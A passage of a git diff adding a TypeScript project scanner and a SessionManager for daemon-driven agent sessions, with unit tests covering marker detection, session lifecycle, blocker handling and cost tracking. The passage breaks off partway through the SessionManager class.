+  it('handles missing scan_root gracefully', async () => {
+    const results = await scanForProjects(['/nonexistent/path/that/does/not/exist']);
+    assert.deepEqual(results, []);
+  });
+
+  it('handles permission errors on entries', { skip: platform() === 'win32' ? 'chmod not reliable on Windows' : undefined }, async () => {
+    const root = tmpDir();
+    cleanupDirs.push(root);
+
+    // Create an accessible project
+    createProject(root, 'accessible', ['.git']);
+
+    // Create an inaccessible directory
+    const noAccess = join(root, 'locked');
+    mkdirSync(noAccess);
+    chmodSync(noAccess, 0o000);
+
+    const results = await scanForProjects([root]);
+
+    // Restore permissions for cleanup
+    chmodSync(noAccess, 0o755);
+
+    // Should find the accessible project but skip the locked one
+    assert.equal(results.length, 1);
+    assert.equal(results[0]!.name, 'accessible');
+  });
+
+  it('detects multiple marker types', async () => {
+    const root = tmpDir();
+    cleanupDirs.push(root);
+
+    createProject(root, 'full-stack', ['.git', 'package.json', '.gsd']);
+
+    const results = await scanForProjects([root]);
+
+    assert.equal(results.length, 1);
+    assert.equal(results[0]!.markers.length, 3);
+    assert.ok(results[0]!.markers.includes('git'));
+    assert.ok(results[0]!.markers.includes('node'));
+    assert.ok(results[0]!.markers.includes('gsd'));
+  });
+
+  it('returns
results sorted alphabetically by name', async () => { + const root = tmpDir(); + cleanupDirs.push(root); + + createProject(root, 'zebra-project', ['.git']); + createProject(root, 'alpha-project', ['.git']); + createProject(root, 'middle-project', ['.git']); + + const results = await scanForProjects([root]); + + assert.equal(results.length, 3); + assert.equal(results[0]!.name, 'alpha-project'); + assert.equal(results[1]!.name, 'middle-project'); + assert.equal(results[2]!.name, 'zebra-project'); + }); + + it('ignores hidden directories', async () => { + const root = tmpDir(); + cleanupDirs.push(root); + + createProject(root, 'visible', ['.git']); + createProject(root, '.hidden', ['.git']); + + const results = await scanForProjects([root]); + + assert.equal(results.length, 1); + assert.equal(results[0]!.name, 'visible'); + }); + + it('ignores node_modules', async () => { + const root = tmpDir(); + cleanupDirs.push(root); + + createProject(root, 'real-project', ['package.json']); + createProject(root, 'node_modules', ['package.json']); + + const results = await scanForProjects([root]); + + assert.equal(results.length, 1); + assert.equal(results[0]!.name, 'real-project'); + }); + + it('skips directories with no markers', async () => { + const root = tmpDir(); + cleanupDirs.push(root); + + createProject(root, 'has-markers', ['.git']); + // Create a plain directory with no markers + mkdirSync(join(root, 'no-markers')); + + const results = await scanForProjects([root]); + + assert.equal(results.length, 1); + assert.equal(results[0]!.name, 'has-markers'); + }); + + it('scans multiple roots', async () => { + const root1 = tmpDir(); + const root2 = tmpDir(); + cleanupDirs.push(root1, root2); + + createProject(root1, 'proj-a', ['.git']); + createProject(root2, 'proj-b', ['Cargo.toml']); + + const results = await scanForProjects([root1, root2]); + + assert.equal(results.length, 2); + assert.equal(results[0]!.name, 'proj-a'); + assert.ok(results[0]!.markers.includes('git')); + 
assert.equal(results[1]!.name, 'proj-b'); + assert.ok(results[1]!.markers.includes('rust')); + }); + + it('detects all supported marker types', async () => { + const root = tmpDir(); + cleanupDirs.push(root); + + createProject(root, 'git-proj', ['.git']); + createProject(root, 'node-proj', ['package.json']); + createProject(root, 'gsd-proj', ['.gsd']); + createProject(root, 'rust-proj', ['Cargo.toml']); + createProject(root, 'python-proj', ['pyproject.toml']); + createProject(root, 'go-proj', ['go.mod']); + + const results = await scanForProjects([root]); + + assert.equal(results.length, 6); + + const byName = new Map(results.map(r => [r.name, r])); + assert.deepEqual(byName.get('git-proj')!.markers, ['git']); + assert.deepEqual(byName.get('node-proj')!.markers, ['node']); + assert.deepEqual(byName.get('gsd-proj')!.markers, ['gsd']); + assert.deepEqual(byName.get('rust-proj')!.markers, ['rust']); + assert.deepEqual(byName.get('python-proj')!.markers, ['python']); + assert.deepEqual(byName.get('go-proj')!.markers, ['go']); + }); + + it('skips non-directory entries', async () => { + const root = tmpDir(); + cleanupDirs.push(root); + + createProject(root, 'real-project', ['.git']); + // Create a regular file at the root level — should be ignored + writeFileSync(join(root, 'some-file.txt'), 'not a directory'); + + const results = await scanForProjects([root]); + + assert.equal(results.length, 1); + assert.equal(results[0]!.name, 'real-project'); + }); + + it('returns empty array for empty scan_roots', async () => { + const results = await scanForProjects([]); + assert.deepEqual(results, []); + }); + + it('deduplicates when same root appears twice', async () => { + const root = tmpDir(); + cleanupDirs.push(root); + + createProject(root, 'only-once', ['.git']); + + const results = await scanForProjects([root, root]); + + // Same directory scanned twice — results will have duplicates + // (this is acceptable; the caller can deduplicate by path if needed) + 
assert.equal(results.length, 2);
+    assert.equal(results[0]!.name, 'only-once');
+    assert.equal(results[1]!.name, 'only-once');
+  });
+});
diff --git a/packages/daemon/src/project-scanner.ts b/packages/daemon/src/project-scanner.ts
new file mode 100644
index 000000000..3eb9b5926
--- /dev/null
+++ b/packages/daemon/src/project-scanner.ts
@@ -0,0 +1,99 @@
+/**
+ * Project scanner — discovers projects in configured scan_roots by detecting
+ * marker files/directories. Reads one level deep (immediate children only).
+ */
+
+import { readdir, stat } from 'node:fs/promises';
+import { join, basename } from 'node:path';
+import type { ProjectInfo, ProjectMarker } from './types.js';
+
+// ---------------------------------------------------------------------------
+// Marker file → project type mapping
+// ---------------------------------------------------------------------------
+
+const MARKER_MAP: ReadonlyMap<string, ProjectMarker> = new Map([
+  ['.git', 'git'],
+  ['package.json', 'node'],
+  ['.gsd', 'gsd'],
+  ['Cargo.toml', 'rust'],
+  ['pyproject.toml', 'python'],
+  ['go.mod', 'go'],
+]);
+
+// ---------------------------------------------------------------------------
+// Public API
+// ---------------------------------------------------------------------------
+
+/**
+ * Scan configured roots for project directories.
+ *
+ * Behaviour:
+ * - Reads immediate children of each root (1 level deep, not recursive)
+ * - Skips hidden directories (starting with `.`) and `node_modules`
+ * - Skips missing roots and permission-denied entries gracefully
+ * - Detects markers via MARKER_MAP; directories with no markers are excluded
+ * - Results are sorted alphabetically by name
+ * - lastModified is the most recent mtime among detected marker files/dirs
+ */
+export async function scanForProjects(scanRoots: string[]): Promise<ProjectInfo[]> {
+  const results: ProjectInfo[] = [];
+
+  for (const root of scanRoots) {
+    let entries: string[];
+    try {
+      entries = await readdir(root);
+    } catch {
+      // Missing root or permission error — skip gracefully
+      continue;
+    }
+
+    for (const entry of entries) {
+      // Skip hidden directories and node_modules
+      if (entry.startsWith('.') || entry === 'node_modules') continue;
+
+      const entryPath = join(root, entry);
+
+      // Must be a directory
+      let entryStat;
+      try {
+        entryStat = await stat(entryPath);
+      } catch {
+        // Permission error or disappeared entry — skip
+        continue;
+      }
+      if (!entryStat.isDirectory()) continue;
+
+      // Detect markers
+      const markers: ProjectMarker[] = [];
+      let latestMtime = 0;
+
+      for (const [markerFile, markerType] of MARKER_MAP) {
+        const markerPath = join(entryPath, markerFile);
+        try {
+          const markerStat = await stat(markerPath);
+          markers.push(markerType);
+          if (markerStat.mtimeMs > latestMtime) {
+            latestMtime = markerStat.mtimeMs;
+          }
+        } catch {
+          // Marker doesn't exist — not an error
+        }
+      }
+
+      // Only include directories with at least one marker
+      if (markers.length === 0) continue;
+
+      results.push({
+        name: basename(entryPath),
+        path: entryPath,
+        markers,
+        lastModified: latestMtime,
+      });
+    }
+  }
+
+  // Sort alphabetically by name
+  results.sort((a, b) => a.name.localeCompare(b.name));
+
+  return results;
+}
diff --git a/packages/daemon/src/session-manager.test.ts b/packages/daemon/src/session-manager.test.ts
new file mode 100644
index 000000000..8adccd670 --- /dev/null +++ b/packages/daemon/src/session-manager.test.ts @@ -0,0 +1,822 @@ +/** + * SessionManager unit tests. + * + * Uses the MockRpcClient + TestableSessionManager pattern (K008) to test + * session lifecycle, event handling, cost tracking, blocker detection, + * and cleanup without spawning real GSD processes. + */ + +import { describe, it, beforeEach, afterEach } from 'node:test'; +import assert from 'node:assert/strict'; +import { resolve, basename } from 'node:path'; +import { mkdtempSync, writeFileSync, mkdirSync, rmSync } from 'node:fs'; +import { tmpdir } from 'node:os'; +import { join } from 'node:path'; + +import { SessionManager } from './session-manager.js'; +import { MAX_EVENTS } from './types.js'; +import type { ManagedSession, PendingBlocker } from './types.js'; +import { Logger } from './logger.js'; + +// --------------------------------------------------------------------------- +// Mock RpcClient (duck-typed to match RpcClient interface) +// --------------------------------------------------------------------------- + +class MockRpcClient { + started = false; + stopped = false; + aborted = false; + prompted: string[] = []; + private eventListeners: Array<(event: Record) => void> = []; + uiResponses: Array<{ requestId: string; response: Record }> = []; + + /** Control — set to make start() reject */ + startError: Error | null = null; + /** Control — set to make init() reject */ + initError: Error | null = null; + /** Control — override sessionId from init */ + initSessionId = 'mock-session-001'; + + cwd: string; + args: string[]; + + constructor(options?: Record) { + this.cwd = (options?.cwd as string) ?? ''; + this.args = (options?.args as string[]) ?? 
[]; + } + + async start(): Promise { + if (this.startError) throw this.startError; + this.started = true; + } + + async stop(): Promise { + this.stopped = true; + } + + async init(): Promise<{ sessionId: string; version: string }> { + if (this.initError) throw this.initError; + return { sessionId: this.initSessionId, version: '2.51.0' }; + } + + onEvent(listener: (event: Record) => void): () => void { + this.eventListeners.push(listener); + return () => { + const idx = this.eventListeners.indexOf(listener); + if (idx >= 0) this.eventListeners.splice(idx, 1); + }; + } + + async prompt(message: string): Promise { + this.prompted.push(message); + } + + async abort(): Promise { + this.aborted = true; + } + + sendUIResponse(requestId: string, response: Record): void { + this.uiResponses.push({ requestId, response }); + } + + /** Test helper — emit an event to all listeners */ + emitEvent(event: Record): void { + for (const listener of this.eventListeners) { + listener(event); + } + } +} + +// --------------------------------------------------------------------------- +// TestableSessionManager — injects mock clients without module mocking (K008) +// --------------------------------------------------------------------------- + +class TestableSessionManager extends SessionManager { + lastClient: MockRpcClient | null = null; + allClients: MockRpcClient[] = []; + private sessionCounter = 0; + nextInitError: Error | null = null; + nextStartError: Error | null = null; + + override async startSession(options: { projectDir: string; command?: string; model?: string; bare?: boolean; cliPath?: string }): Promise { + const { projectDir } = options; + + if (!projectDir || projectDir.trim() === '') { + throw new Error('projectDir is required and cannot be empty'); + } + + const resolvedDir = resolve(projectDir); + const projectName = basename(resolvedDir); + + // Check duplicate via getSessionByDir + const existing = this.getSessionByDir(resolvedDir); + if (existing) { + throw new 
Error( + `Session already active for ${resolvedDir} (sessionId: ${existing.sessionId}, status: ${existing.status})` + ); + } + + const client = new MockRpcClient({ cwd: resolvedDir, args: [] }); + if (this.nextStartError) { + client.startError = this.nextStartError; + this.nextStartError = null; + } + if (this.nextInitError) { + client.initError = this.nextInitError; + this.nextInitError = null; + } + + this.sessionCounter++; + client.initSessionId = `mock-session-${String(this.sessionCounter).padStart(3, '0')}`; + this.lastClient = client; + this.allClients.push(client); + + // Build session shell + const session: ManagedSession = { + sessionId: '', + projectDir: resolvedDir, + projectName, + status: 'starting', + client: client as any, // duck-typed mock + events: [], + pendingBlocker: null, + cost: { totalCost: 0, tokens: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 } }, + startTime: Date.now(), + }; + + // Insert into internal sessions map + (this as any).sessions.set(resolvedDir, session); + + try { + await client.start(); + + const initResult = await client.init(); + session.sessionId = initResult.sessionId; + session.status = 'running'; + + // Wire event tracking using parent's handleEvent + session.unsubscribe = client.onEvent((event: Record) => { + (this as any).handleEvent(session, event); + }); + + // Kick off auto-mode + const command = options.command ?? '/gsd auto'; + await client.prompt(command); + + // Emit lifecycle events (matching parent behavior) + (this as any).logger.info('session started', { sessionId: session.sessionId, projectDir: resolvedDir }); + this.emit('session:started', { sessionId: session.sessionId, projectDir: resolvedDir, projectName }); + + return session.sessionId; + } catch (err) { + session.status = 'error'; + session.error = err instanceof Error ? 
err.message : String(err); + try { await client.stop(); } catch { /* swallow */ } + + (this as any).logger.error('session error', { sessionId: session.sessionId, projectDir: resolvedDir, error: session.error }); + this.emit('session:error', { sessionId: session.sessionId, projectDir: resolvedDir, projectName, error: session.error }); + + throw new Error(`Failed to start session for ${resolvedDir}: ${session.error}`); + } + } +} + +// --------------------------------------------------------------------------- +// Logger spy helper +// --------------------------------------------------------------------------- + +interface LogCall { + level: string; + msg: string; + data?: Record; +} + +class SpyLogger { + calls: LogCall[] = []; + private tmpDir: string; + logger: Logger; + + constructor() { + this.tmpDir = mkdtempSync(join(tmpdir(), 'sm-test-')); + this.logger = new Logger({ + filePath: join(this.tmpDir, 'test.log'), + level: 'debug', + }); + + // Intercept write calls by wrapping the logger methods + const original = { + debug: this.logger.debug.bind(this.logger), + info: this.logger.info.bind(this.logger), + warn: this.logger.warn.bind(this.logger), + error: this.logger.error.bind(this.logger), + }; + + this.logger.debug = (msg: string, data?: Record) => { + this.calls.push({ level: 'debug', msg, data }); + original.debug(msg, data); + }; + this.logger.info = (msg: string, data?: Record) => { + this.calls.push({ level: 'info', msg, data }); + original.info(msg, data); + }; + this.logger.warn = (msg: string, data?: Record) => { + this.calls.push({ level: 'warn', msg, data }); + original.warn(msg, data); + }; + this.logger.error = (msg: string, data?: Record) => { + this.calls.push({ level: 'error', msg, data }); + original.error(msg, data); + }; + } + + async cleanup(): Promise { + await this.logger.close(); + try { rmSync(this.tmpDir, { recursive: true, force: true }); } catch { /* ignore */ } + } + + findCalls(level: string, msgSubstring: string): LogCall[] { + 
return this.calls.filter(c => c.level === level && c.msg.includes(msgSubstring)); + } +} + +// --------------------------------------------------------------------------- +// Test Helpers +// --------------------------------------------------------------------------- + +let allManagers: TestableSessionManager[] = []; +let allSpyLoggers: SpyLogger[] = []; + +function createManager(): { manager: TestableSessionManager; spy: SpyLogger } { + const spy = new SpyLogger(); + const manager = new TestableSessionManager(spy.logger); + allManagers.push(manager); + allSpyLoggers.push(spy); + return { manager, spy }; +} + +// --------------------------------------------------------------------------- +// Tests +// --------------------------------------------------------------------------- + +describe('SessionManager', () => { + afterEach(async () => { + for (const m of allManagers) { + try { await m.cleanup(); } catch { /* swallow */ } + } + allManagers = []; + for (const s of allSpyLoggers) { + await s.cleanup(); + } + allSpyLoggers = []; + }); + + // ---- Lifecycle: start → running → completed ---- + + it('start → running → completed lifecycle', async () => { + const { manager, spy } = createManager(); + + const sessionId = await manager.startSession({ projectDir: '/tmp/test-project' }); + assert.ok(sessionId); + + const session = manager.getSession(sessionId); + assert.ok(session); + assert.equal(session.status, 'running'); + assert.equal(session.projectName, 'test-project'); + + // Simulate terminal notification + manager.lastClient!.emitEvent({ + type: 'extension_ui_request', + id: 'n1', + method: 'notify', + message: 'Auto-mode stopped: completed all tasks', + }); + + assert.equal(session.status, 'completed'); + + // Verify logger calls + const startedLogs = spy.findCalls('info', 'session started'); + assert.equal(startedLogs.length, 1); + const completedLogs = spy.findCalls('info', 'session completed'); + assert.equal(completedLogs.length, 1); + }); + + // ---- 
Lifecycle: start → running → blocked → resolve → running → completed ---- + + it('start → blocked → resolve → running → completed lifecycle', async () => { + const { manager } = createManager(); + + const sessionId = await manager.startSession({ projectDir: '/tmp/test-project-2' }); + const session = manager.getSession(sessionId)!; + + // Simulate blocking UI request (non-fire-and-forget method) + manager.lastClient!.emitEvent({ + type: 'extension_ui_request', + id: 'blocker-1', + method: 'confirm', + title: 'Merge PR?', + message: 'Should I merge this PR?', + }); + + assert.equal(session.status, 'blocked'); + assert.ok(session.pendingBlocker); + assert.equal(session.pendingBlocker!.id, 'blocker-1'); + assert.equal(session.pendingBlocker!.method, 'confirm'); + + // Resolve the blocker + await manager.resolveBlocker(sessionId, 'yes'); + + assert.equal(session.status, 'running'); + assert.equal(session.pendingBlocker, null); + + // Verify UI response was sent + const client = manager.lastClient!; + assert.equal(client.uiResponses.length, 1); + assert.equal(client.uiResponses[0].requestId, 'blocker-1'); + + // Complete the session + manager.lastClient!.emitEvent({ + type: 'extension_ui_request', + id: 'n2', + method: 'notify', + message: 'Auto-mode stopped: all done', + }); + + assert.equal(session.status, 'completed'); + }); + + // ---- Lifecycle: start → error (init failure) ---- + + it('start → error when init fails', async () => { + const { manager, spy } = createManager(); + + manager.nextInitError = new Error('Connection refused'); + + await assert.rejects( + () => manager.startSession({ projectDir: '/tmp/test-error-project' }), + (err: Error) => { + assert.ok(err.message.includes('Connection refused')); + return true; + } + ); + + // Session should still exist in map with error status + const session = manager.getSessionByDir('/tmp/test-error-project'); + assert.ok(session); + assert.equal(session.status, 'error'); + 
assert.ok(session.error?.includes('Connection refused')); + + // Logger should have error call + const errorLogs = spy.findCalls('error', 'session error'); + assert.equal(errorLogs.length, 1); + }); + + // ---- Duplicate session prevention ---- + + it('rejects duplicate session for same projectDir', async () => { + const { manager } = createManager(); + + await manager.startSession({ projectDir: '/tmp/dup-test' }); + + await assert.rejects( + () => manager.startSession({ projectDir: '/tmp/dup-test' }), + (err: Error) => { + assert.ok(err.message.includes('Session already active')); + return true; + } + ); + }); + + // ---- Cancel session ---- + + it('cancels a running session', async () => { + const { manager, spy } = createManager(); + + const sessionId = await manager.startSession({ projectDir: '/tmp/cancel-test' }); + const session = manager.getSession(sessionId)!; + const client = manager.lastClient!; + + await manager.cancelSession(sessionId); + + assert.equal(session.status, 'cancelled'); + assert.ok(client.aborted); + assert.ok(client.stopped); + + const cancelLogs = spy.findCalls('info', 'session cancelled'); + assert.equal(cancelLogs.length, 1); + }); + + // ---- Cost accumulation (K004 cumulative-max) ---- + + it('accumulates cost using cumulative-max pattern (K004)', async () => { + const { manager } = createManager(); + + const sessionId = await manager.startSession({ projectDir: '/tmp/cost-test' }); + const session = manager.getSession(sessionId)!; + const client = manager.lastClient!; + + // First cost update + client.emitEvent({ + type: 'cost_update', + runId: 'run-1', + turnCost: 0.01, + cumulativeCost: 0.01, + tokens: { input: 100, output: 50, cacheRead: 20, cacheWrite: 10 }, + }); + + assert.equal(session.cost.totalCost, 0.01); + assert.equal(session.cost.tokens.input, 100); + + // Second cost update — cumulative values should increase + client.emitEvent({ + type: 'cost_update', + runId: 'run-1', + turnCost: 0.02, + cumulativeCost: 0.03, + tokens: 
{ input: 250, output: 120, cacheRead: 40, cacheWrite: 20 }, + }); + + assert.equal(session.cost.totalCost, 0.03); + assert.equal(session.cost.tokens.input, 250); + assert.equal(session.cost.tokens.output, 120); + + // Third update with lower values — max should hold + client.emitEvent({ + type: 'cost_update', + runId: 'run-2', + turnCost: 0.005, + cumulativeCost: 0.02, // lower than 0.03 — should NOT replace + tokens: { input: 50, output: 30, cacheRead: 5, cacheWrite: 2 }, + }); + + assert.equal(session.cost.totalCost, 0.03); // max held + assert.equal(session.cost.tokens.input, 250); // max held + }); + + // ---- Ring buffer event trimming ---- + + it('trims events when exceeding MAX_EVENTS', async () => { + const { manager } = createManager(); + + const sessionId = await manager.startSession({ projectDir: '/tmp/ringbuf-test' }); + const session = manager.getSession(sessionId)!; + const client = manager.lastClient!; + + // Push MAX_EVENTS + 20 events + for (let i = 0; i < MAX_EVENTS + 20; i++) { + client.emitEvent({ + type: 'assistant_message', + id: `msg-${i}`, + content: `Event ${i}`, + }); + } + + assert.equal(session.events.length, MAX_EVENTS); + // Oldest events should be trimmed — first event should be #20 + const firstEvent = session.events[0] as Record; + assert.equal(firstEvent.id, 'msg-20'); + }); + + // ---- Blocker detection (non-fire-and-forget extension_ui_request) ---- + + it('detects blocker from non-fire-and-forget extension_ui_request', async () => { + const { manager, spy } = createManager(); + + const sessionId = await manager.startSession({ projectDir: '/tmp/blocker-test' }); + const session = manager.getSession(sessionId)!; + + manager.lastClient!.emitEvent({ + type: 'extension_ui_request', + id: 'sel-1', + method: 'select', + title: 'Choose deployment target', + options: ['staging', 'production'], + }); + + assert.equal(session.status, 'blocked'); + assert.ok(session.pendingBlocker); + assert.equal(session.pendingBlocker!.method, 'select'); 
+ + const blockedLogs = spy.findCalls('info', 'session blocked'); + assert.equal(blockedLogs.length, 1); + }); + + // ---- Fire-and-forget methods do NOT block ---- + + it('fire-and-forget methods do not trigger blocker', async () => { + const { manager } = createManager(); + + const sessionId = await manager.startSession({ projectDir: '/tmp/faf-test' }); + const session = manager.getSession(sessionId)!; + + // setStatus is fire-and-forget + manager.lastClient!.emitEvent({ + type: 'extension_ui_request', + id: 'st-1', + method: 'setStatus', + statusKey: 'build', + statusText: 'Building...', + }); + + assert.equal(session.status, 'running'); + assert.equal(session.pendingBlocker, null); + }); + + // ---- Terminal detection (auto-mode stopped notification) ---- + + it('detects terminal from auto-mode stopped notification', async () => { + const { manager } = createManager(); + + const sessionId = await manager.startSession({ projectDir: '/tmp/terminal-test' }); + const session = manager.getSession(sessionId)!; + + manager.lastClient!.emitEvent({ + type: 'extension_ui_request', + id: 'n1', + method: 'notify', + message: 'Step-mode stopped: user requested', + }); + + assert.equal(session.status, 'completed'); + }); + + // ---- getAllSessions returns all tracked sessions ---- + + it('getAllSessions returns all tracked sessions', async () => { + const { manager } = createManager(); + + await manager.startSession({ projectDir: '/tmp/proj-a' }); + await manager.startSession({ projectDir: '/tmp/proj-b' }); + await manager.startSession({ projectDir: '/tmp/proj-c' }); + + const all = manager.getAllSessions(); + assert.equal(all.length, 3); + + const dirs = all.map(s => s.projectDir).sort(); + assert.ok(dirs[0].endsWith('proj-a')); + assert.ok(dirs[1].endsWith('proj-b')); + assert.ok(dirs[2].endsWith('proj-c')); + }); + + // ---- cleanup stops all active sessions ---- + + it('cleanup stops all active sessions', async () => { + const { manager } = createManager(); + + await 
manager.startSession({ projectDir: '/tmp/cleanup-a' }); + await manager.startSession({ projectDir: '/tmp/cleanup-b' }); + + const clients = [...manager.allClients]; + assert.equal(clients.length, 2); + + await manager.cleanup(); + + const all = manager.getAllSessions(); + for (const s of all) { + assert.equal(s.status, 'cancelled'); + } + // Both clients should have been stopped + for (const c of clients) { + assert.ok(c.stopped); + } + }); + + // ---- EventEmitter: session:started ---- + + it('emits session:started event', async () => { + const { manager } = createManager(); + + let emittedData: Record | undefined; + manager.on('session:started', (data: Record) => { emittedData = data; }); + + const sessionId = await manager.startSession({ projectDir: '/tmp/emit-start' }); + + assert.ok(emittedData); + assert.equal(emittedData.sessionId, sessionId); + assert.equal(emittedData.projectName, 'emit-start'); + }); + + // ---- EventEmitter: session:blocked ---- + + it('emits session:blocked event', async () => { + const { manager } = createManager(); + + let emittedData: Record | undefined; + manager.on('session:blocked', (data: Record) => { emittedData = data; }); + + await manager.startSession({ projectDir: '/tmp/emit-blocked' }); + + manager.lastClient!.emitEvent({ + type: 'extension_ui_request', + id: 'b-1', + method: 'input', + title: 'Enter API key', + }); + + assert.ok(emittedData); + assert.equal((emittedData.blocker as PendingBlocker).id, 'b-1'); + }); + + // ---- EventEmitter: session:completed ---- + + it('emits session:completed event', async () => { + const { manager } = createManager(); + + let emittedData: Record | undefined; + manager.on('session:completed', (data: Record) => { emittedData = data; }); + + await manager.startSession({ projectDir: '/tmp/emit-completed' }); + + manager.lastClient!.emitEvent({ + type: 'extension_ui_request', + id: 'n1', + method: 'notify', + message: 'Auto-mode stopped: success', + }); + + assert.ok(emittedData); + 
assert.equal(emittedData.projectName, 'emit-completed'); + }); + + // ---- EventEmitter: session:error ---- + + it('emits session:error event on init failure', async () => { + const { manager } = createManager(); + + let emittedData: Record | undefined; + manager.on('session:error', (data: Record) => { emittedData = data; }); + + manager.nextInitError = new Error('Process crashed'); + + try { + await manager.startSession({ projectDir: '/tmp/emit-error' }); + } catch { /* expected */ } + + assert.ok(emittedData); + assert.ok((emittedData.error as string).includes('Process crashed')); + }); + + // ---- EventEmitter: session:event ---- + + it('emits session:event for every forwarded event', async () => { + const { manager } = createManager(); + + const events: Record[] = []; + manager.on('session:event', (data) => { events.push(data); }); + + await manager.startSession({ projectDir: '/tmp/emit-event' }); + + manager.lastClient!.emitEvent({ type: 'assistant_message', id: 'a1', content: 'Hello' }); + manager.lastClient!.emitEvent({ type: 'tool_use', id: 't1', name: 'read' }); + + assert.equal(events.length, 2); + }); + + // ---- Empty projectDir rejection ---- + + it('rejects empty projectDir', async () => { + const { manager } = createManager(); + + await assert.rejects( + () => manager.startSession({ projectDir: '' }), + (err: Error) => { + assert.ok(err.message.includes('projectDir is required')); + return true; + } + ); + + await assert.rejects( + () => manager.startSession({ projectDir: ' ' }), + (err: Error) => { + assert.ok(err.message.includes('projectDir is required')); + return true; + } + ); + }); + + // ---- Logger receives structured calls ---- + + it('logger receives structured calls during lifecycle', async () => { + const { manager, spy } = createManager(); + + const sessionId = await manager.startSession({ projectDir: '/tmp/log-test' }); + + // Should have 'session started' info log + const started = spy.findCalls('info', 'session started'); + 
assert.equal(started.length, 1); + assert.ok(started[0].data?.sessionId); + assert.ok(started[0].data?.projectDir); + + // Emit an event — should produce debug log + manager.lastClient!.emitEvent({ type: 'assistant_message', id: 'a1', content: 'hi' }); + const debugLogs = spy.findCalls('debug', 'session event'); + assert.ok(debugLogs.length >= 1); + assert.ok(debugLogs[0].data?.type); + }); + + // ---- getResult returns structured status ---- + + it('getResult returns structured status', async () => { + const { manager } = createManager(); + + const sessionId = await manager.startSession({ projectDir: '/tmp/result-test' }); + const result = manager.getResult(sessionId); + + assert.equal(result.sessionId, sessionId); + assert.equal(result.status, 'running'); + assert.equal(result.projectName, 'result-test'); + assert.equal(result.error, null); + assert.equal(result.pendingBlocker, null); + assert.ok(typeof result.durationMs === 'number'); + assert.ok(result.cost); + assert.ok(Array.isArray(result.recentEvents)); + }); + + // ---- getResult throws for unknown session ---- + + it('getResult throws for unknown sessionId', () => { + const { manager } = createManager(); + + assert.throws( + () => manager.getResult('nonexistent'), + (err: Error) => err.message.includes('Session not found') + ); + }); + + // ---- resolveBlocker throws when no blocker pending ---- + + it('resolveBlocker throws when no blocker pending', async () => { + const { manager } = createManager(); + + const sessionId = await manager.startSession({ projectDir: '/tmp/no-blocker' }); + + await assert.rejects( + () => manager.resolveBlocker(sessionId, 'yes'), + (err: Error) => err.message.includes('No pending blocker') + ); + }); + + // ---- cancelSession throws for unknown session ---- + + it('cancelSession throws for unknown sessionId', async () => { + const { manager } = createManager(); + + await assert.rejects( + () => manager.cancelSession('nonexistent'), + (err: Error) => 
err.message.includes('Session not found') + ); + }); + + // ---- Blocked notification detected as blocker, not terminal ---- + + it('blocked notification sets status to blocked, not completed', async () => { + const { manager } = createManager(); + + const sessionId = await manager.startSession({ projectDir: '/tmp/blocked-notify' }); + const session = manager.getSession(sessionId)!; + + manager.lastClient!.emitEvent({ + type: 'extension_ui_request', + id: 'bn-1', + method: 'notify', + message: 'Auto-mode stopped: Blocked: waiting for approval', + }); + + assert.equal(session.status, 'blocked'); + assert.ok(session.pendingBlocker); + }); + + // ---- projectName is basename of resolved projectDir ---- + + it('projectName is basename of projectDir', async () => { + const { manager } = createManager(); + + const sessionId = await manager.startSession({ projectDir: '/home/user/projects/my-app' }); + const session = manager.getSession(sessionId)!; + + assert.equal(session.projectName, 'my-app'); + }); + + // ---- Custom command is sent instead of default ---- + + it('sends custom command when provided', async () => { + const { manager } = createManager(); + + await manager.startSession({ projectDir: '/tmp/custom-cmd', command: '/gsd quick fix-typo' }); + const client = manager.lastClient!; + + assert.ok(client.prompted.includes('/gsd quick fix-typo')); + assert.ok(!client.prompted.includes('/gsd auto')); + }); + + // ---- getSessionByDir returns session by directory lookup ---- + + it('getSessionByDir returns session by directory', async () => { + const { manager } = createManager(); + + await manager.startSession({ projectDir: '/tmp/dir-lookup' }); + const session = manager.getSessionByDir('/tmp/dir-lookup'); + + assert.ok(session); + assert.equal(session.projectName, 'dir-lookup'); + }); +}); diff --git a/packages/daemon/src/session-manager.ts b/packages/daemon/src/session-manager.ts new file mode 100644 index 000000000..d954e37db --- /dev/null +++ 
b/packages/daemon/src/session-manager.ts @@ -0,0 +1,394 @@ +/** + * SessionManager — manages RpcClient lifecycle for daemon-driven GSD execution. + * + * Extends EventEmitter to emit typed session lifecycle events. + * One active session per projectDir. Tracks events in a ring buffer, + * detects blockers, tracks terminal state, and accumulates cost using + * the cumulative-max pattern (K004). + * + * Adapted from packages/mcp-server/src/session-manager.ts with: + * - Logger integration for structured logging + * - EventEmitter for session lifecycle events + * - getAllSessions() for cross-project status (R035) + * - projectName field on ManagedSession + */ + +import { execSync } from 'node:child_process'; +import { basename, resolve } from 'node:path'; +import { EventEmitter } from 'node:events'; +import { RpcClient } from '@gsd-build/rpc-client'; +import type { SdkAgentEvent, RpcInitResult, RpcCostUpdateEvent, RpcExtensionUIRequest } from '@gsd-build/rpc-client'; +import type { + ManagedSession, + StartSessionOptions, + PendingBlocker, +} from './types.js'; +import { MAX_EVENTS, INIT_TIMEOUT_MS } from './types.js'; +import type { Logger } from './logger.js'; + +// --------------------------------------------------------------------------- +// Inlined detection logic (from headless-events.ts — no internal package imports) +// --------------------------------------------------------------------------- + +const FIRE_AND_FORGET_METHODS = new Set([ + 'notify', 'setStatus', 'setWidget', 'setTitle', 'set_editor_text', +]); + +const TERMINAL_PREFIXES = ['auto-mode stopped', 'step-mode stopped']; + +function isTerminalNotification(event: Record): boolean { + if (event.type !== 'extension_ui_request' || event.method !== 'notify') return false; + const message = String(event.message ?? 
'').toLowerCase();
+  return TERMINAL_PREFIXES.some((prefix) => message.startsWith(prefix));
+}
+
+/** True for notify events whose message marks a blocker ("blocked:"). */
+function isBlockedNotification(event: Record<string, unknown>): boolean {
+  if (event.type !== 'extension_ui_request' || event.method !== 'notify') return false;
+  const message = String(event.message ?? '').toLowerCase();
+  return message.includes('blocked:');
+}
+
+/** True for extension_ui_request events that expect a response (i.e. block). */
+function isBlockingUIRequest(event: Record<string, unknown>): boolean {
+  if (event.type !== 'extension_ui_request') return false;
+  const method = String(event.method ?? '');
+  return !FIRE_AND_FORGET_METHODS.has(method);
+}
+
+// ---------------------------------------------------------------------------
+// SessionManager
+// ---------------------------------------------------------------------------
+
+export class SessionManager extends EventEmitter {
+  /** Sessions keyed by resolved projectDir for duplicate-start prevention */
+  private sessions = new Map<string, ManagedSession>();
+
+  constructor(private readonly logger: Logger) {
+    super();
+  }
+
+  /**
